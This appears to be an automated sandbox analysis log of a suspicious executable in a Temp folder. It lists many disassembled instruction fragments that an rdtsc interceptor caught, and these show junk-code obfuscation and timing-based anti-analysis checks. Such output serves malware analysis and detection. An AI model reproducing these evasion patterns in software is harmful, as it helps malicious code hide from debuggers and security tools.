                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DB01 second address: 84DB70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FD81D0C8436h 0x00000011 mov eax, dword ptr [eax] 0x00000013 ja 00007FD81D0C8433h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jmp 00007FD81D0C8439h 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 popad 0x0000002a pop eax 0x0000002b movsx edi, cx 0x0000002e push EC898A1Eh 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007FD81D0C8428h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DD2E second address: 84DDAA instructions: 0x00000000 rdtsc 0x00000002 je 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD81C888260h 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD81C888258h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FD81C888264h 0x00000032 mov edi, 217D6F06h 0x00000037 mov cx, F6FAh 0x0000003b nop 0x0000003c jmp 00007FD81C888268h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007FD81C888258h 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DDAA second address: 84DDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85A124 second address: 85A1DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD81C888269h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e mov dword ptr [ebp+12450214h], ecx 0x00000014 call 00007FD81C88825Ch 0x00000019 mov edx, dword ptr [ebp+122D29C3h] 0x0000001f pop edi 0x00000020 popad 0x00000021 push dword ptr fs:[00000000h] 0x00000028 stc 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 jmp 00007FD81C88825Eh 0x00000035 mov edi, dword ptr [ebp+122D2A5Fh] 0x0000003b mov eax, dword ptr [ebp+122D10C1h] 0x00000041 jmp 00007FD81C888263h 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FD81C888258h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 jmp 00007FD81C888268h 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d push ebx 0x0000006e pop ebx 0x0000006f popad 0x00000070 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85A1DC second address: 85A1F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FD81D0C8426h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jbe 00007FD81D0C8426h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85A1F5 second address: 85A1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85C1A0 second address: 85C1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85D275 second address: 85D27F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85D27F second address: 85D2B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FD81D0C8426h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007FD81D0C8433h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD81D0C842Ch 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85F3BC second address: 85F3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jnc 00007FD81C888256h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 jp 00007FD81C888256h 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD81C888260h 0x0000001f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86043D second address: 860464 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD81D0C8438h 0x00000008 jmp 00007FD81D0C8432h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jns 00007FD81D0C8426h 0x00000019 pop edx 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8614A7 second address: 8614C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C888267h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E749 second address: 84E74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E82C second address: 84E832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E832 second address: 84E867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub cx, E0E4h 0x00000010 lea eax, dword ptr [ebp+1248E210h] 0x00000016 js 00007FD81D0C842Bh 0x0000001c mov ecx, 6BB054C0h 0x00000021 nop 0x00000022 pushad 0x00000023 jmp 00007FD81D0C842Fh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E867 second address: 84E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C888263h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FD81C88825Bh 0x00000011 nop 0x00000012 xor dword ptr [ebp+122D2714h], ebx 0x00000018 lea eax, dword ptr [ebp+1248E1CCh] 0x0000001e or dl, 00000031h 0x00000021 nop 0x00000022 jl 00007FD81C888263h 0x00000028 jmp 00007FD81C88825Dh 0x0000002d push eax 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E8B6 second address: 82A6D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov edx, 42EC4D32h 0x00000011 call dword ptr [ebp+12456AD3h] 0x00000017 jbe 00007FD81D0C8438h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 82A6D3 second address: 82A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 82A6D7 second address: 82A6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8838DA second address: 8838DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8838DF second address: 8838E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8838E6 second address: 8838EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 883BB9 second address: 883BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 jmp 00007FD81D0C8433h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 883BE7 second address: 883BF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD81C88825Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 883D84 second address: 883D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8430h 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 883D99 second address: 883DB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD81C88825Ch 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD81C888256h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884025 second address: 884029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884029 second address: 884062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FD81C888256h 0x00000010 jmp 00007FD81C888268h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884062 second address: 884078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884078 second address: 88407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88407C second address: 884086 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D517 second address: 88D51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D51D second address: 88D521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D521 second address: 88D527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D527 second address: 88D553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8432h 0x00000009 jmp 00007FD81D0C8436h 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C3F7 second address: 88C40B instructions: 0x00000000 rdtsc 0x00000002 js 00007FD81C88825Ch 0x00000008 jc 00007FD81C888256h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C40B second address: 88C418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FD81D0C8432h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C5BC second address: 88C5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnl 00007FD81C888256h 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FD81C888256h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C8BD second address: 88C8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C8C1 second address: 88C8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD81C888256h 0x00000011 jmp 00007FD81C888266h 0x00000016 popad 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C8E9 second address: 88C8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C8EF second address: 88C8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88C8FB second address: 88C8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88CCD9 second address: 88CCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C888263h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88CE60 second address: 88CE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88CE64 second address: 88CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD81C888256h 0x0000000e jmp 00007FD81C888265h 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D269 second address: 88D26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88D26E second address: 88D275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88FDAE second address: 88FDBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C842Dh 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88FDBF second address: 88FDC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 893B27 second address: 893B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8433h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 893C66 second address: 893CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD81C888268h 0x0000000b jmp 00007FD81C888268h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 897F7D second address: 897F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD81D0C8426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 897F89 second address: 897F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 897F8E second address: 897FAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81D0C8432h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FD81D0C842Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 897FAD second address: 897FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 897FB9 second address: 897FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8432h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 898295 second address: 89829B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89871C second address: 898721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 898721 second address: 898741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD81C888265h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 898741 second address: 898747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 898747 second address: 898765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD81C888260h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD81C88825Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CD95 second address: 89CDE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8435h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD81D0C8439h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FD81D0C8431h 0x0000001b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CDE0 second address: 89CDF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD81C88825Ah 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CDF2 second address: 89CDF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CF4F second address: 89CF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD81C888263h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CF67 second address: 89CF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89CF6D second address: 89CF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E263 second address: 84E2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FD81D0C8431h 0x0000000c popad 0x0000000d nop 0x0000000e call 00007FD81D0C842Eh 0x00000013 mov dword ptr [ebp+1245431Bh], edi 0x00000019 pop edi 0x0000001a mov ebx, dword ptr [ebp+1248E20Bh] 0x00000020 movzx ecx, di 0x00000023 add eax, ebx 0x00000025 cld 0x00000026 or edi, 0FC72802h 0x0000002c push eax 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84E2AA second address: 84E2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89D7B5 second address: 89D7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD81D0C842Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C842Fh 0x00000011 jnp 00007FD81D0C8426h 0x00000017 rdtsc
